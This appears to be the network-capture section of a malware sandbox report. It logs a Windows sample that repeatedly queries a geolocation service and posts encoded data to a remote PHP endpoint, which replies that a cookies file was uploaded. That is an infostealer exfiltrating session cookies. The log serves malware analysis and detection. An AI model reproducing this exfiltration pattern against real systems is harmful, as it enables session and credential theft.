                                                                                                                                    Nov 26, 2024 09:47:32.074982882 CET143OUTPOST /den/P4.php HTTP/1.1
                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                    Host: the.drillmmcsnk.top
                                                                                                                                    Content-Length: 1432
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Nov 26, 2024 09:47:32.080909967 CET1432OUTData Raw: 4f 6f 74 33 31 38 52 46 2f 49 4d 30 31 6d 6e 32 32 36 54 44 73 44 6e 49 39 6b 36 34 73 4e 7a 73 53 32 47 7a 49 79 75 6c 39 6f 58 45 52 4c 74 7a 44 71 79 6d 7a 67 6f 68 6e 46 75 54 57 42 75 63 34 55 4f 66 36 7a 68 34 66 65 7a 79 46 33 4a 62 35 61
                                                                                                                                    Data Ascii: Oot318RF/IM01mn226TDsDnI9k64sNzsS2GzIyul9oXERLtzDqymzgohnFuTWBuc4UOf6zh4fezyF3Jb5aomYApGlM2IZ+Ud7ODVinHSkavuZNWS1MHQu/3ufbsIkeagg8b41z4LfM4bUwurwJHmvk2m7thijOTHqseg1hS2CcOcXIWBRrrFuGMJ3cu7qFlfgZZli4MJgBEVbjf7YQ26eBh+1kVGF8QKxn+UqGjjaugVMi5QNyD
                                                                                                                                    Nov 26, 2024 09:47:33.427690983 CET250INHTTP/1.1 201 Created
                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                    content-length: 86
                                                                                                                                    date: Tue, 26 Nov 2024 08:47:33 GMT
                                                                                                                                    server: LiteSpeed
                                                                                                                                    connection: Keep-Alive
                                                                                                                                    Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 44 61 74 61 20 75 70 6c 6f 61 64 65 64 20 61 6e 64 20 64 65 63 72 79 70 74 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 2c 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 43 6f 6f 6b 69 65 73 5f 32 31 37 39 2e 74 78 74 22 7d
                                                                                                                                    Data Ascii: {"message":"Data uploaded and decrypted successfully.","file_name":"Cookies_2179.txt"}


                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.749700104.21.67.1524436748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-26 08:46:55 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-11-26 08:46:56 UTC849INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:46:56 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 574725
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jjls3R8upyG98iW%2BtfOvuvmIIXf4gmsCWzUPCJC6fGVpJ5hOJ84lEP7FAFKO2m3tnIVBTS5DLDG2AFILAHOQ3Vl8oFfx3MDbX3qg0SiyCTwJGW6hxx2B4g8P96%2BAjKKTfBLrUfZf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e889c60486ec345-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1519&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1808049&cwnd=178&unsent_bytes=0&cid=7447ace6ec9778a4&ts=525&x=0"
                                                                                                                                    2024-11-26 08:46:56 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.749701104.21.67.1524436748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-26 08:46:57 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    2024-11-26 08:46:58 UTC853INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:46:58 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 574727
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wZv%2BNRB%2FI8M3qNgk1MTbn%2B0xOgu69O9jtYm4OoEVDe4u1A2ksBMOdAE6mrAfFfjLn6l8S2i9tt89bLHxbPSq6necXnrraMUepdJu5Jn5Z6ioUI9cX4lDk7wuz4d8r2Pc3aNg8gX%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e889c6e2b754361-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2157&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1331509&cwnd=218&unsent_bytes=0&cid=ca5b94c98f601454&ts=464&x=0"
                                                                                                                                    2024-11-26 08:46:58 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    2192.168.2.749703104.21.67.1524436748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-26 08:47:01 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-11-26 08:47:01 UTC851INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:01 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 574730
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EgxlzuOfg7NRBT9Z9HLzpF9xujB7VT7qYjhkHQ1yQDawcrzz6NXlHcDoj3J1TRzPw%2BuP9CBkdzgEYhOlQTwulxsQfpRqSpu%2F3jbXNZdcE41btlz1rCf09tv1s%2BDJXae9CAt6wiQD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e889c83493d42a9-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1593886&cwnd=190&unsent_bytes=0&cid=56782a2853e71e13&ts=469&x=0"
                                                                                                                                    2024-11-26 08:47:01 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    3192.168.2.749706104.21.67.1524436748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-26 08:47:04 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-11-26 08:47:05 UTC857INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:04 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 574733
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Eu%2FI%2Bj6p3UNXFS2W4x6bp2oMjM9qoozJTVerdhpqqjY%2BO44pqPAdAZbEJIBaJ6FgxDqeQVBYyo%2FOwLeyOn1tXuGN7UTWeLIkyEvz%2BUWeQWsuC3i472R1pAqPFQQ0VT%2FQMxSGfcTC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e889c97e8030f81-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1627&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1726788&cwnd=238&unsent_bytes=0&cid=71c95eeb9099a845&ts=459&x=0"
                                                                                                                                    2024-11-26 08:47:05 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    4192.168.2.749718104.21.67.1524436748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-26 08:47:08 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    2024-11-26 08:47:09 UTC857INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:08 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 574737
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aHQp%2B8uptKGsf3D0%2F35SPF8bUpLRjTX9MLMDJiDancedy1PDm2WbN999XxibH2iCEkfnjvs8j7aXOmrkvlvoul33gvv5XGSTq00fyQhW%2BYcWqxnlhXmWTP%2F1Xr%2FqtRAtkmQ%2BDOoL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e889cb08f3d42c8-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1526&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1825000&cwnd=225&unsent_bytes=0&cid=0a8981b5d2fa900b&ts=459&x=0"
                                                                                                                                    2024-11-26 08:47:09 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    5192.168.2.749734104.21.67.1524436748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-26 08:47:13 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-11-26 08:47:13 UTC855INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:13 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 574742
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jStVIWdRFyzlxV1UqGk3WxKtX%2BFTpB%2F8oS6I8QSeBpi15T%2B%2Fham0795NKo5jMMpiVF9RB9USAwKdsbwDucEdcxSYB67Hxl%2BPNqvs3E2TdskvonTt36GlV2kYATGjxjVGlltAm7GC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e889ccc1bf27c9c-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1975&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1471774&cwnd=252&unsent_bytes=0&cid=19de8bcd8e40ebb6&ts=458&x=0"
                                                                                                                                    2024-11-26 08:47:13 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    6192.168.2.749742104.21.67.1524436748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-26 08:47:16 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-11-26 08:47:16 UTC849INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:16 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 574745
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4JEiLDQYWtidHzRrMDJeniewlSRccYXL75vcvlA0%2BDB5L9NPgSVlyYWGJseDVK3IoDbVzwlIBxVjBlL26Z6EJDOgdKJ6x3OA4YPdd20NunsyyLsw7oGp2vpQCbA%2FJYUUcX7R60xo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e889ce16dfd1906-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1708601&cwnd=252&unsent_bytes=0&cid=95544cab385a6654&ts=468&x=0"
                                                                                                                                    2024-11-26 08:47:16 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    7192.168.2.749754104.21.67.1524436748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-26 08:47:19 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    2024-11-26 08:47:20 UTC853INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:20 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 574749
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ggGZW7teZ9JLSIJffZDZT2Z9isjl2NRa21mtPv3cN8oYxjA9t%2FpGqJSRegcb4e0c%2BrZZo2G7LPDtG%2BqN3Q83pGhZJ%2BjkNltxEBBll76BLfyyQNgttdUpxYoRbJs2Y7FHxYdOx2C"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e889cf68dc842e4-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1564&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1861057&cwnd=228&unsent_bytes=0&cid=5ac5192ddf0c7578&ts=464&x=0"
                                                                                                                                    2024-11-26 08:47:20 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
